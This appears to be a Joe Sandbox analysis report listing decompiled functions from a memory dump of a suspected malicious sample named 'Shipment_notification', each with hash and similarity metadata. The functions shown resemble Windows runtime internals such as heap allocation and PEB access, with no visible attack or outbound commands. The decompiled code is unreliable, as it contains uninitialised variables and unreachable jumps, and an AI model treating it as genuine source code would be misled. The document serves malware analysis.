                                                                                				_push( &_v56);
                                                                                				_push(0x10);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7865775c23d3dbebc5f347052cb682030e54faab3efeb4adae823d3cdfd5339d
                                                                                • Instruction ID: a79029a8f8278abd255652530c03b83059d95fc0fa27e914587cd974e7a2bc69
                                                                                • Opcode Fuzzy Hash: 7865775c23d3dbebc5f347052cb682030e54faab3efeb4adae823d3cdfd5339d
                                                                                • Instruction Fuzzy Hash: 7D013171A05219AFCB58DFA9D545AAEB7F4FF18700F404099F955EB381EB349A00CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E01BB8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				short _v50;
                                                                                				char _v56;
                                                                                				signed char* _t18;
                                                                                				void* _t24;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t29 = __edx;
                                                                                				_v8 =  *0x1bdd360 ^ _t32;
                                                                                				_v16 = __ecx;
                                                                                				_v50 = 0x1c2c;
                                                                                				_v24 = _a4;
                                                                                				_v20 = _a8;
                                                                                				_v12 = __edx;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t18 = 0x7ffe0386;
                                                                                				} else {
                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                				}
                                                                                				_push( &_v56);
                                                                                				_push(0x10);
                                                                                				_push(0x402);
                                                                                				return L01B2B640(E01B29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b79c752420d80859f62f82685f1749f462dd3fbc74cd881948c7b56868074549
                                                                                • Instruction ID: 95acf80b5eac25c533be2a8c15ad40b52fcf8d1b57a6d49a13f92fc0de9de80c
                                                                                • Opcode Fuzzy Hash: b79c752420d80859f62f82685f1749f462dd3fbc74cd881948c7b56868074549
                                                                                • Instruction Fuzzy Hash: 4E014474A0121DAFDB18EFA8D545AAEB7F4EF18300F104499F945EB390EB74DA00CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B0C577(void* __ecx, char _a4) {
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t17;
                                                                                				void* _t19;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				_t21 = __ecx;
                                                                                				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E01B0C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ac11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                					__eflags = _a4;
                                                                                					if(__eflags != 0) {
                                                                                						L10:
                                                                                						E01BB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                						L9:
                                                                                						return 0;
                                                                                					}
                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                					if(__eflags == 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                					goto L9;
                                                                                				} else {
                                                                                					return 1;
                                                                                				}
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37a0c71bdaa00eede14ebfa3245af7da653cc3c4953e04fe2c0f4cc2f4081fc5
                                                                                • Instruction ID: 29be3ba560f514ecabc7a34d835f65f47a71c4fc1d4e33075e68dfcc78cb1aaa
                                                                                • Opcode Fuzzy Hash: 37a0c71bdaa00eede14ebfa3245af7da653cc3c4953e04fe2c0f4cc2f4081fc5
                                                                                • Instruction Fuzzy Hash: 16F090BA9156949FE73F871C8046B227FD8DB05670F4447EAD505875C2D7A6D880C350
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E01BB8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				short _v42;
                                                                                				char _v48;
                                                                                				signed char* _t12;
                                                                                				void* _t18;
                                                                                				void* _t24;
                                                                                				void* _t25;
                                                                                				signed int _t26;
                                                                                
                                                                                				_t23 = __edx;
                                                                                				_v8 =  *0x1bdd360 ^ _t26;
                                                                                				_v16 = __ecx;
                                                                                				_v42 = 0x1c2b;
                                                                                				_v12 = __edx;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t12 = 0x7ffe0386;
                                                                                				} else {
                                                                                					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                				}
                                                                                				_push( &_v48);
                                                                                				_push(8);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
                                                                                			}














                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ecdbc3ecdb49428bf8568ea1ad284ce8245fa843c86d4f067563929b56bb514
                                                                                • Instruction ID: 16ee1869f6c7c7549d02c5856bd1f771a35e4a39935a3055037ca4fb4b4f4deb
                                                                                • Opcode Fuzzy Hash: 5ecdbc3ecdb49428bf8568ea1ad284ce8245fa843c86d4f067563929b56bb514
                                                                                • Instruction Fuzzy Hash: AFF0B470A046189FDB18EFB8D541AAEB7B8EF14300F1080D9E905EB280EF34D900C754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E01BA2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                				void* __esi;
                                                                                				signed char _t3;
                                                                                				signed char _t7;
                                                                                				void* _t19;
                                                                                
                                                                                				_t17 = __ecx;
                                                                                				_t3 = E01B9FD22(__ecx);
                                                                                				_t19 =  *0x1bd849c - _t3; // 0x0
                                                                                				if(_t19 == 0) {
                                                                                					__eflags = _t17 -  *0x1bd8748; // 0x0
                                                                                					if(__eflags <= 0) {
                                                                                						E01BA1C06();
                                                                                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                						__eflags = _t3;
                                                                                						if(_t3 != 0) {
                                                                                							L5:
                                                                                							__eflags =  *0x1bd8724 & 0x00000004;
                                                                                							if(( *0x1bd8724 & 0x00000004) == 0) {
                                                                                								asm("int3");
                                                                                								return _t3;
                                                                                							}
                                                                                						} else {
                                                                                							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                							__eflags = _t3 - 3;
                                                                                							if(_t3 == 3) {
                                                                                								goto L5;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return _t3;
                                                                                				} else {
                                                                                					_t7 =  *0x1bd8724; // 0x0
                                                                                					return E01B98DF1(__ebx, 0xc0000374, 0x1bd5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                				}
                                                                                			}








                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82b8f796f7ba13e366293c30efa53663c95ac6a2e7c374432ca9fcf8671c777a
                                                                                • Instruction ID: 03ee8b7fff99098783bb87cdbddab47b8c08493530d22f638f074eadf09b77bc
                                                                                • Opcode Fuzzy Hash: 82b8f796f7ba13e366293c30efa53663c95ac6a2e7c374432ca9fcf8671c777a
                                                                                • Instruction Fuzzy Hash: E1F0552B42A1C54ADF3F6B2CB1213E13F92DB5A211F8A00CAD8909B209D7348883CF20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E01B2927A(void* __ecx) {
                                                                                				signed int _t11;
                                                                                				void* _t14;
                                                                                
                                                                                				_t11 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                				if(_t11 != 0) {
                                                                                					E01B2FA60(_t11, 0, 0x98);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                					E01B292C6(_t11, _t14);
                                                                                				}
                                                                                				return _t11;
                                                                                			}






                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                • Instruction ID: 1d19fe3ce60794ebc50afc577e290f224482d739a988322039f42b95fea72251
                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                • Instruction Fuzzy Hash: 66E0E5322405116BEB159E49CC80B133669DF92724F0140B8F5081E282C7E5D80C87A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E01BB8CD6(intOrPtr __ecx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				short _v38;
                                                                                				char _v44;
                                                                                				signed char* _t11;
                                                                                				void* _t17;
                                                                                				void* _t22;
                                                                                				void* _t23;
                                                                                				void* _t24;
                                                                                				signed int _t25;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t25;
                                                                                				_v12 = __ecx;
                                                                                				_v38 = 0x1c2d;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t11 = 0x7ffe0386;
                                                                                				} else {
                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                				}
                                                                                				_push( &_v44);
                                                                                				_push(0xffffffe4);
                                                                                				_push(0x402);
                                                                                				return L01B2B640(E01B29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
                                                                                			}














                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab8fe6411299f999852fe605ad989fb045214750c3327300f7a3269d743e34f7
                                                                                • Instruction ID: e1e7ba5ab99e0ae9d97354c4f63a6ee7b7cffcace512f22ffb221da69a71ad18
                                                                                • Opcode Fuzzy Hash: ab8fe6411299f999852fe605ad989fb045214750c3327300f7a3269d743e34f7
                                                                                • Instruction Fuzzy Hash: 6BF054709056199BDF18DBA8D555DAE77B8EF15200F100199E955EB2C0EB34D9048754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E01B0746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                				signed int _t8;
                                                                                				void* _t10;
                                                                                				short* _t17;
                                                                                				void* _t19;
                                                                                				intOrPtr _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				_t20 = __esi;
                                                                                				_t19 = __edi;
                                                                                				_t17 = __ebx;
                                                                                				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                					if(__ecx == 0) {
                                                                                						E01AFEB70(__ecx, 0x1bd79a0);
                                                                                					} else {
                                                                                						asm("lock xadd [ecx], eax");
                                                                                						if((_t8 | 0xffffffff) == 0) {
                                                                                							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                							E01B295D0();
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                						}
                                                                                					}
                                                                                					L10:
                                                                                				}
                                                                                				_t10 = _t19 + _t19;
                                                                                				if(_t20 >= _t10) {
                                                                                					if(_t19 != 0) {
                                                                                						 *_t17 = 0;
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				return _t10;
                                                                                				goto L10;
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b36029dcc0068aaebc21ebfcc82a395c8491d2dd34047d4993ffe4a279f1f47
                                                                                • Instruction ID: 7a54e78035f4fd6c97249c30e6735d038acde54e9ef604eef612261cb747ce09
                                                                                • Opcode Fuzzy Hash: 7b36029dcc0068aaebc21ebfcc82a395c8491d2dd34047d4993ffe4a279f1f47
                                                                                • Instruction Fuzzy Hash: 36F09A34A00245AADF0F9A6CC840B7DFFA1AF04254F0682D9D9D1AB1A1EB25A800C695
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AE4F2E(void* __ecx, char _a4) {
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t17;
                                                                                				void* _t19;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				_t21 = __ecx;
                                                                                				if(__ecx == 0) {
                                                                                					L6:
                                                                                					__eflags = _a4;
                                                                                					if(__eflags != 0) {
                                                                                						L8:
                                                                                						E01BB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                						L9:
                                                                                						return 0;
                                                                                					}
                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                					if(__eflags != 0) {
                                                                                						goto L9;
                                                                                					}
                                                                                					goto L8;
                                                                                				}
                                                                                				_t18 = __ecx + 0x30;
                                                                                				if(E01B0C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ac1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                					goto L6;
                                                                                				} else {
                                                                                					return 1;
                                                                                				}
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca606e20a99b2c5770446834a65c602884efc89f567fe7fee909736d3c30eff3
                                                                                • Instruction ID: 5bda81d150afd512748e6c072835358ffb0f7473bb026bb5df805a5deac4e982
                                                                                • Opcode Fuzzy Hash: ca606e20a99b2c5770446834a65c602884efc89f567fe7fee909736d3c30eff3
                                                                                • Instruction Fuzzy Hash: 98F0E9325256848FDB76FB1CC144BA27BE8EB08B74F44C4E4E505C7912C724EC40D644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E01BB8B58(intOrPtr __ecx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v20;
                                                                                				short _v46;
                                                                                				char _v52;
                                                                                				signed char* _t11;
                                                                                				void* _t17;
                                                                                				void* _t22;
                                                                                				void* _t23;
                                                                                				void* _t24;
                                                                                				signed int _t25;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t25;
                                                                                				_v20 = __ecx;
                                                                                				_v46 = 0x1c26;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t11 = 0x7ffe0386;
                                                                                				} else {
                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                				}
                                                                                				_push( &_v52);
                                                                                				_push(4);
                                                                                				_push(0x402);
                                                                                				return L01B2B640(E01B29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
                                                                                			}














                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a8d1fad9dbc053dbf62e437b464c2341248cb1f9461d187f5077747e954787a
                                                                                • Instruction ID: a1ef4a63cb1767cfe5949af2f4590834273cc828cb6f7119babcf1e3ecf712bf
                                                                                • Opcode Fuzzy Hash: 7a8d1fad9dbc053dbf62e437b464c2341248cb1f9461d187f5077747e954787a
                                                                                • Instruction Fuzzy Hash: 06F05EB0A04259ABDF28EBB8D946A7EB7B8EB04300F040599FA05DB2C0EB74D900C794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B1A44B(signed int __ecx) {
                                                                                				intOrPtr _t13;
                                                                                				signed int _t15;
                                                                                				signed int* _t16;
                                                                                				signed int* _t17;
                                                                                
                                                                                				_t13 =  *0x1bd7b9c; // 0x0
                                                                                				_t15 = __ecx;
                                                                                				_t16 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                                				if(_t16 == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				 *_t16 = _t15;
                                                                                				_t17 =  &(_t16[2]);
                                                                                				E01B2FA60(_t17, 0, _t15 << 2);
                                                                                				return _t17;
                                                                                			}








                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fc34aab0a7576154968029c43d5768b5a89292f89d527eecd4ba05f0c0399f3
                                                                                • Instruction ID: 96a5cd4e39392f2f6cfc4b5b8d8054276f159865347560b62f374d513d832b74
                                                                                • Opcode Fuzzy Hash: 0fc34aab0a7576154968029c43d5768b5a89292f89d527eecd4ba05f0c0399f3
                                                                                • Instruction Fuzzy Hash: 3EE0D872A42421ABD7265F58FC40F6777ADDBE9A51F0A4079F604C7258DB28ED01C7E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E01AEF358(void* __ecx, signed int __edx) {
                                                                                				char _v8;
                                                                                				signed int _t9;
                                                                                				void* _t20;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t9 = 2;
                                                                                				_t20 = 0;
                                                                                				if(E01B1F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                					_t20 = L01B04620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                				}
                                                                                				return _t20;
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                • Instruction ID: 0d3ce375d03ee772370ee22d44d49b237c88a47fe82f7c61b3a7ef73094cfda9
                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                • Instruction Fuzzy Hash: 5CE0DF32A40119FFDB21AAD99E09FAABFACDB98A60F0101D6FA04D7190D6709E00C2D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AFFF60(intOrPtr _a4) {
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				void* _t13;
                                                                                				intOrPtr _t14;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				void* _t17;
                                                                                
                                                                                				_t14 = _a4;
                                                                                				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1ac11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                					return E01BB88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                                				} else {
                                                                                					return E01B00050(_t14);
                                                                                				}
                                                                                			}











                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b6783580ee2e91ce1b3e6b93d2530a89172c16698c68a1de64c576ecb0c5208
                                                                                • Instruction ID: f187472fc7d20de2e68c8c5ca5d1860bc75322c70a6e500f663b769efd9a6cc4
                                                                                • Opcode Fuzzy Hash: 9b6783580ee2e91ce1b3e6b93d2530a89172c16698c68a1de64c576ecb0c5208
                                                                                • Instruction Fuzzy Hash: 3AE026B2205304DFDB3ADFDAD880F253BAC9F52721F19845DF20A4B502C721D880C386
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E01B741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t5;
                                                                                				void* _t14;
                                                                                
                                                                                				_push(8);
                                                                                				_push(0x1bc08f0);
                                                                                				_t5 = E01B3D08C(__ebx, __edi, __esi);
                                                                                				if( *0x1bd87ec == 0) {
                                                                                					E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                					if( *0x1bd87ec == 0) {
                                                                                						 *0x1bd87f0 = 0x1bd87ec;
                                                                                						 *0x1bd87ec = 0x1bd87ec;
                                                                                						 *0x1bd87e8 = 0x1bd87e4;
                                                                                						 *0x1bd87e4 = 0x1bd87e4;
                                                                                					}
                                                                                					 *(_t14 - 4) = 0xfffffffe;
                                                                                					_t5 = L01B74248();
                                                                                				}
                                                                                				return E01B3D0D1(_t5);
                                                                                			}






                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c71c71c398b8031ff8eab0de78925d9990d7b3252687dfff7635bce0edc29067
                                                                                • Instruction ID: c763a0c1cbb9c762ba8f2d87e388dae996647943ef532a4484de150736c5a2d0
                                                                                • Opcode Fuzzy Hash: c71c71c398b8031ff8eab0de78925d9990d7b3252687dfff7635bce0edc29067
                                                                                • Instruction Fuzzy Hash: AEF03979922702EFCBBEEFA9D52070476B4F794713F42419AD11087298E73444A4CF02
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B9D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                				void* _t5;
                                                                                
                                                                                				if(_a4 != 0) {
                                                                                					_t5 = L01AEE8B0(__ecx, _a4, 0xfff);
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                					return _t5;
                                                                                				}
                                                                                				return 0xc000000d;
                                                                                			}





                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                • Instruction ID: a25adddb7dce48d966af305a23cc46c82e99f926e72fe9bcdfd9cbc0a8041eae
                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                • Instruction Fuzzy Hash: BAE0C231284205FBDF275E84CC00F79BB56DB507A1F104071FE085A691CB75AC92D6C4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B1A185() {
                                                                                				void* __ecx;
                                                                                				intOrPtr* _t5;
                                                                                
                                                                                				if( *0x1bd67e4 >= 0xa) {
                                                                                					if(_t5 < 0x1bd6800 || _t5 >= 0x1bd6900) {
                                                                                						return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                					} else {
                                                                                						goto L1;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					return E01B00010(0x1bd67e0, _t5);
                                                                                				}
                                                                                			}






                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ad827453200e54abecb09c9b1ebe3ee58db58b16faecf291ca724bbb7c8d6db
                                                                                • Instruction ID: 56cef9eabdee7b9805d0e268105252708969f34ef4bd7bc16ff0bf0ade052b43
                                                                                • Opcode Fuzzy Hash: 8ad827453200e54abecb09c9b1ebe3ee58db58b16faecf291ca724bbb7c8d6db
                                                                                • Instruction Fuzzy Hash: 3BD02B6212208416CB2E6321CC54B213712F7847A0F3604DDF2030B5E9FF61A8E08109
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B116E0(void* __edx, void* __eflags) {
                                                                                				void* __ecx;
                                                                                				void* _t3;
                                                                                
                                                                                				_t3 = E01B11710(0x1bd67e0);
                                                                                				if(_t3 == 0) {
                                                                                					_t6 =  *[fs:0x30];
                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                						goto L1;
                                                                                					} else {
                                                                                						return L01B04620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					return _t3;
                                                                                				}
                                                                                			}






                                                                                Memory Dump Source
